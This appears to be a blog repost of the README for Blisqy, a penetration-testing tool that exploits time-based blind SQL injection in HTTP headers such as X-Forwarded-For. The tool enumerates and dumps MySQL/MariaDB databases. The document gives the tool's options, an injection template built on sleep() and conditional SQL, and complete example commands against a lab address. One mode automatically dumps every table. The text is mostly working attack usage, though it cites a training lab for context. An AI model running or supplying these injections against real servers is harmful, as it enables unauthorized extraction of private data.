Blisqy - Exploit Time-based blind-SQL injection in HTTP-Headers (MySQL/MariaDB)
A slow data siphon for MySQL/MariaDB using bitwise operation on printable ASCII characters, via a blind-SQL injection.
Usage
USAGE:
blisqy.py --server <Web Server> --port <port> --header <vulnerable header> --hvalue <header value>
--inject <point of injection> --payload <custom sql payload> --dig <yes/no> --sleeptime <default 0.5>
Options:
-h, --help show this help message and exit
--server=WEBSERVER Specify host (web server) IP
--port=PORT Specify port
--header=VULNHEADER Provide a vulnerable HTTP Header
--hvalue=HEADERVALUE Specify the value for the vulnerable header
--inject=INJECTION Provide where to inject Sqli payload
--payload=PAYLOAD Provide SQL statment/query to inject as payload
--dig=DIGGER Automatic Mysql-Schema enumeration (takes time!)
--sleeptime=SLEEP Sleep-Time for blind-SQLi query (default : 0.5)
--interactive=INTERACT
Turn interactive mode on/off (default : off)
Basics
Blisqy will assit you enumerate a MySQL/Maria DB after finding a Time-Based Blind Sql injection vulnerability on a web server. Currently, it supports injections on HTTP Headers. You should have identified a potential Blind Sql injection vulnerability on a Webserver as demonstrated on Pentester-Lab (From SQL Injection to Shell II)
So you can't run Blisqy without :
--server
: the vulnerable Webserver--port
: Which port is the webserver running on?--header
: the identified vulnerable HTTP header--hvalue
: value for the identified vulnerable HTTP header
--inject
: what to inject after the hvalue
(SQLi Payload).Options :
--inject
After identifying a Time-Based BlindSQL injection on a web-server, this option enables the user craft and insert SQL-injection payloads. The value for this option should look like this :
--inject "' or if((*sql*),sleep(*time*),0) and '1'='1"
Where
*sql*
- is where SQL Payloads will be inserted and*time*
- is where Time-Based test will be inserted.
--sleeptime
Blisqy now accepts user set --sleeptime and it's inserted on
--inject *time*
. Always make sure you have fine tuned this value to resonates with your environment and network lantency.... Otherwise you'll be toased! (the lower the value, the faster we go). E.g. --sleeeptime 0.1
--payload
This option allows the user run their own custom SQL-injection payloads. Other options like
--dig
and --interactive
MUST not be set (should be ignored) for this option to run.Example :
Command
./blisqy.py --server 192.168.56.101 --port 80 --header "X-Forwarded-For" --hvalue "hacker"
--sleeptime 0.1
--inject "' or if((*sql*),sleep(*time*),0) and '1'='1"
--payload "select @@hostname"
--interactive
This option accept two values i.e on or off and it compliments option
--dig
(this option must be set to yes
). If set as --interactive on
the user will get to choose which discovered table to enumerate and decide if data from the table should be dumped or not. When set as "--interactive off", every table gets enumerated and all data dumped.Getting data from a Table :
The user can decide which columns to extract data from when
--interactive
is set on. The format looks something like this : column1*column1*column2
- just the column names separated by an asterisk. User can also avoid data collection on a particular table by entering skip
instead of the column names.Example :
Command
./blisqy.py --server 192.168.56.101 --port 80 --header "X-Forwarded-For" --hvalue "hacker" --dig yes
--sleeptime 0.1 --interactive on --inject "' or if((*sql*),sleep(*time*),0) and '1'='1"
Blisqy - Exploit Time-based blind-SQL injection in HTTP-Headers (MySQL/MariaDB)
Reviewed by Zion3R
on
10:21 AM
Rating: